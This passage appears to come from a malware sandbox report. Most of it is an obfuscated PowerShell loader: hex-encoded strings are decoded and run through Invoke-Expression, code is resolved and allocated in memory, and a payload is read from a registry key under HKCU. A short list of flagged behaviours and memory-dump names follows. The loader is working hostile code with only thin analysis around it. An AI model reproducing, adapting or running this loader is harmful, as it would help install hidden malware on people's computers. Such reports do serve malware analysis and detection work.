'DDEAE9E3EAECFBEAEBCBEAE3EAE8EEFBEA';$Sparegris9=Aliped0 'C6E1C2EAE2E0FDF6C2E0EBFAE3EA';$Lepus0=Aliped0 'C2F6CBEAE3EAE8EEFBEADBF6FFEA';$Lepus1=Aliped0 'CCE3EEFCFCA3AFDFFAEDE3E6ECA3AFDCEAEEE3EAEBA3AFCEE1FCE6CCE3EEFCFCA3AFCEFAFBE0CCE3EEFCFC';$Lepus2=Aliped0 'C6E1F9E0E4EA';$Lepus3=Aliped0 'DFFAEDE3E6ECA3AFC7E6EBEACDF6DCE6E8A3AFC1EAF8DCE3E0FBA3AFD9E6FDFBFAEEE3';$Lepus4=Aliped0 'D9E6FDFBFAEEE3CEE3E3E0EC';$Lepus5=Aliped0 'E1FBEBE3E3';$Lepus6=Aliped0 'C1FBDFFDE0FBEAECFBD9E6FDFBFAEEE3C2EAE2E0FDF6';$Lepus7=Aliped0 'C6CAD7';$Lepus8=Aliped0 'D3';$Regretters=Aliped0 'DADCCADDBCBD';$africanist=Aliped0 'CCEEE3E3D8E6E1EBE0F8DFFDE0ECCE';function fkp {Param ($Bedlar, $Catonically) ;$relaxing0 =Aliped0 
'ABDFE0FBEAE1ECF6AFB2AFA7D4CEFFFFCBE0E2EEE6E1D2B5B5CCFAFDFDEAE1FBCBE0E2EEE6E1A1C8EAFBCEFCFCEAE2EDE3E6EAFCA7A6AFF3AFD8E7EAFDEAA2C0EDE5EAECFBAFF4AFABD0A1C8E3E0EDEEE3CEFCFCEAE2EDE3F6CCEEECE7EAAFA2CEE1EBAFABD0A1C3E0ECEEFBE6E0E1A1DCFFE3E6FBA7ABC3EAFFFAFCB7A6D4A2BED2A1CAFEFAEEE3FCA7ABDCFFEEFDEAE8FDE6FCBFA6AFF2A6A1C8EAFBDBF6FFEAA7ABDCFFEEFDEAE8FDE6FCBEA6';&($Lepus7) $relaxing0;$relaxing5 = Aliped0 'ABE3FCEAE9EAFDE6EAFDE1EAAFB2AFABDFE0FBEAE1ECF6A1C8EAFBC2EAFBE7E0EBA7ABDCFFEEFDEAE8FDE6FCBDA3AFD4DBF6FFEAD4D2D2AFCFA7ABDCFFEEFDEAE8FDE6FCBCA3AFABDCFFEEFDEAE8FDE6FCBBA6A6';&($Lepus7) $relaxing5;$relaxing1 = Aliped0 'FDEAFBFAFDE1AFABE3FCEAE9EAFDE6EAFDE1EAA1C6E1F9E0E4EAA7ABE1FAE3E3A3AFCFA7D4DCF6FCFBEAE2A1DDFAE1FBE6E2EAA1C6E1FBEAFDE0FFDCEAFDF9E6ECEAFCA1C7EEE1EBE3EADDEAE9D2A7C1EAF8A2C0EDE5EAECFBAFDCF6FCFBEAE2A1DDFAE1FBE6E2EAA1C6E1FBEAFDE0FFDCEAFDF9E6ECEAFCA1C7EEE1EBE3EADDEAE9A7A7C1EAF8A2C0EDE5EAECFBAFC6E1FBDFFBFDA6A3AFA7ABDFE0FBEAE1ECF6A1C8EAFBC2EAFBE7E0EBA7ABDCFFEEFDEAE8FDE6FCBAA6A6A1C6E1F9E0E4EAA7ABE1FAE3E3A3AFCFA7ABCDEAEBE3EEFDA6A6A6A6A3AFABCCEEFBE0E1E6ECEEE3E3F6A6A6';&($Lepus7) $relaxing1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Medicinalvarefabrikker,[Parameter(Position = 1)] [Type] $Rbdig = [Void]);$relaxing2 = Aliped0 'ABDDE6FBE0FDE1EAE3E3EAE1FCAFB2AFD4CEFFFFCBE0E2EEE6E1D2B5B5CCFAFDFDEAE1FBCBE0E2EEE6E1A1CBEAE9E6E1EACBF6E1EEE2E6ECCEFCFCEAE2EDE3F6A7A7C1EAF8A2C0EDE5EAECFBAFDCF6FCFBEAE2A1DDEAE9E3EAECFBE6E0E1A1CEFCFCEAE2EDE3F6C1EEE2EAA7ABDCFFEEFDEAE8FDE6FCB7A6A6A3AFD4DCF6FCFBEAE2A1DDEAE9E3EAECFBE6E0E1A1CAE2E6FBA1CEFCFCEAE2EDE3F6CDFAE6E3EBEAFDCEECECEAFCFCD2B5B5DDFAE1A6A1CBEAE9E6E1EACBF6E1EEE2E6ECC2E0EBFAE3EAA7ABDCFFEEFDEAE8FDE6FCB6A3AFABE9EEE3FCEAA6A1CBEAE9E6E1EADBF6FFEAA7ABC3EAFFFAFCBFA3AFABC3EAFFFAFCBEA3AFD4DCF6FCFBEAE2A1C2FAE3FBE6ECEEFCFBCBEAE3EAE8EEFBEAD2A6';&($Lepus7) $relaxing2;$relaxing3 = Aliped0 
'ABDDE6FBE0FDE1EAE3E3EAE1FCA1CBEAE9E6E1EACCE0E1FCFBFDFAECFBE0FDA7ABDCFFEEFDEAE8FDE6FCB9A3AFD4DCF6FCFBEAE2A1DDEAE9E3EAECFBE6E0E1A1CCEEE3E3E6E1E8CCE0E1F9EAE1FBE6E0E1FCD2B5B5DCFBEEE1EBEEFDEBA3AFABC2EAEBE6ECE6E1EEE3F9EEFDEAE9EEEDFDE6E4E4EAFDA6A1DCEAFBC6E2FFE3EAE2EAE1FBEEFBE6E0E1C9E3EEE8FCA7ABDCFFEEFDEAE8FDE6FCB8A6';&($Lepus7) $relaxing3;$relaxing4 = Aliped0 'ABDDE6FBE0FDE1EAE3E3EAE1FCA1CBEAE9E6E1EAC2EAFBE7E0EBA7ABC3EAFFFAFCBDA3AFABC3EAFFFAFCBCA3AFABDDEDEBE6E8A3AFABC2EAEBE6ECE6E1EEE3F9EEFDEAE9EEEDFDE6E4E4EAFDA6A1DCEAFBC6E2FFE3EAE2EAE1FBEEFBE6E0E1C9E3EEE8FCA7ABDCFFEEFDEAE8FDE6FCB8A6';&($Lepus7) $relaxing4;$relaxing5 = Aliped0 'FDEAFBFAFDE1AFABDDE6FBE0FDE1EAE3E3EAE1FCA1CCFDEAEEFBEADBF6FFEAA7A6';&($Lepus7) $relaxing5 ;}$fejlagtiges = Aliped0 'E4EAFDE1EAE3BCBD';$relaxing6 = Aliped0 'ABDAE7E5FBE6EBEAE3E6E8BBB9AFB2AFD4DCF6FCFBEAE2A1DDFAE1FBE6E2EAA1C6E1FBEAFDE0FFDCEAFDF9E6ECEAFCA1C2EEFDFCE7EEE3D2B5B5C8EAFBCBEAE3EAE8EEFBEAC9E0FDC9FAE1ECFBE6E0E1DFE0E6E1FBEAFDA7A7E9E4FFAFABE9EAE5E3EEE8FBE6E8EAFCAFABC3EAFFFAFCBBA6A3AFA7C8CBDBAFCFA7D4C6E1FBDFFBFDD2A3AFD4DAC6E1FBBCBDD2A3AFD4DAC6E1FBBCBDD2A3AFD4DAC6E1FBBCBDD2A6AFA7D4C6E1FBDFFBFDD2A6A6A6';&($Lepus7) $relaxing6;$Shaduf = fkp $Lepus5 $Lepus6;$relaxing7 = Aliped0 'ABC9EAE3E3E6E1E8BCAFB2AFABDAE7E5FBE6EBEAE3E6E8BBB9A1C6E1F9E0E4EAA7D4C6E1FBDFFBFDD2B5B5D5EAFDE0A3AFB9BABAA3AFBFF7BCBFBFBFA3AFBFF7BBBFA6';&($Lepus7) $relaxing7;$relaxing8 = Aliped0 'ABDAEBE3EEE1EBFCFBFDEEE9E6E4AFB2AFABDAE7E5FBE6EBEAE3E6E8BBB9A1C6E1F9E0E4EAA7D4C6E1FBDFFBFDD2B5B5D5EAFDE0A3AFBCB8BEBAB7B6BEBDA3AFBFF7BCBFBFBFA3AFBFF7BBA6';&($Lepus7) $relaxing8;$Felling00='HKCU:\Referencekortene90\Lykkeridderens';$Felling01 =Aliped0 'ABFCFAE3FBEEE1EAFCFCB2A7C8EAFBA2C6FBEAE2DFFDE0FFEAFDFBF6AFA2DFEEFBE7AFABC9EAE3E3E6E1E8BFBFA6A1FBEEE3EAE0FDE8EEE1EAFD';&($Lepus7) $Felling01;$relaxing9 = Aliped0 'ABFDEAE3EEF7E6E1E8AFB2AFD4DCF6FCFBEAE2A1CCE0E1F9EAFDFBD2B5B5C9FDE0E2CDEEFCEAB9BBDCFBFDE6E1E8A7ABFCFAE3FBEEE1EAFCFCA6';&($Lepus7) $relaxing9;$sultaness0 = Aliped0 
'D4DCF6FCFBEAE2A1DDFAE1FBE6E2EAA1C6E1FBEAFDE0FFDCEAFDF9E6ECEAFCA1C2EEFDFCE7EEE3D2B5B5CCE0FFF6A7ABFDEAE3EEF7E6E1E8A3AFBFA3AFAFABC9EAE3E3E6E1E8BCA3AFB9BABAA6';&($Lepus7) $sultaness0;$Indemnifications77=$relaxing.count-655;$sultaness1 = Aliped0 'D4DCF6FCFBEAE2A1DDFAE1FBE6E2EAA1C6E1FBEAFDE0FFDCEAFDF9E6ECEAFCA1C2EEFDFCE7EEE3D2B5B5CCE0FFF6A7ABFDEAE3EEF7E6E1E8A3AFB9BABAA3AFABDAEBE3EEE1EBFCFBFDEEE9E6E4A3AFABC6E1EBEAE2E1E6E9E6ECEEFBE6E0E1FCB8B8A6';&($Lepus7) $sultaness1;$sultaness2 = Aliped0 'ABC3EEFDEBEAFDEAE3E3E6FBEAAFB2AFD4DCF6FCFBEAE2A1DDFAE1FBE6E2EAA1C6E1FBEAFDE0FFDCEAFDF9E6ECEAFCA1C2EEFDFCE7EEE3D2B5B5C8EAFBCBEAE3EAE8EEFBEAC9E0FDC9FAE1ECFBE6E0E1DFE0E6E1FBEAFDA7A7E9E4FFAFABDDEAE8FDEAFBFBEAFDFCAFABEEE9FDE6ECEEE1E6FCFBA6A3AFA7C8CBDBAFCFA7D4C6E1FBDFFBFDD2A3AFD4C6E1FBDFFBFDD2A3AFD4C6E1FBDFFBFDD2A3AFD4C6E1FBDFFBFDD2A3AFD4C6E1FBDFFBFDD2A6AFA7D4C6E1FBDFFBFDD2A6A6A6';&($Lepus7) $sultaness2;$sultaness3 = Aliped0 'ABC3EEFDEBEAFDEAE3E3E6FBEAA1C6E1F9E0E4EAA7ABC9EAE3E3E6E1E8BCA3ABDAEBE3EEE1EBFCFBFDEEE9E6E4A3ABDCE7EEEBFAE9A3BFA3BFA6';&($Lepus7) $sultaness3#"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- memory/3160-132-0x0000000000000000-mapping.dmp
- memory/3160-133-0x000001DC54280000-0x000001DC542A2000-memory.dmp (Filesize: 136KB)
- memory/3160-148-0x00007FFCFFE40000-0x00007FFD00901000-memory.dmp (Filesize: 10.8MB)
- memory/3160-135-0x00007FFCFFE40000-0x00007FFD00901000-memory.dmp (Filesize: 10.8MB)
- memory/4892-140-0x0000000006010000-0x0000000006076000-memory.dmp (Filesize: 408KB)
- memory/4892-137-0x00000000058A0000-0x0000000005EC8000-memory.dmp (Filesize: 6.2MB)
- memory/4892-138-0x0000000005F00000-0x0000000005F22000-memory.dmp (Filesize: 136KB)
- memory/4892-139-0x0000000005FA0000-0x0000000006006000-memory.dmp (Filesize: 408KB)
- memory/4892-136-0x00000000051C0000-0x00000000051F6000-memory.dmp (Filesize: 216KB)
- memory/4892-141-0x0000000006790000-0x00000000067AE000-memory.dmp (Filesize: 120KB)
- memory/4892-142-0x0000000008100000-0x000000000877A000-memory.dmp (Filesize: 6.5MB)
- memory/4892-143-0x0000000006CE0000-0x0000000006CFA000-memory.dmp (Filesize: 104KB)
- memory/4892-144-0x0000000007A80000-0x0000000007B16000-memory.dmp (Filesize: 600KB)
- memory/4892-145-0x00000000079A0000-0x00000000079C2000-memory.dmp (Filesize: 136KB)
- memory/4892-146-0x000000000AAF0000-0x000000000B094000-memory.dmp (Filesize: 5.6MB)
- memory/4892-147-0x0000000008780000-0x000000000AAF0000-memory.dmp (Filesize: 35.4MB)
- memory/4892-134-0x0000000000000000-mapping.dmp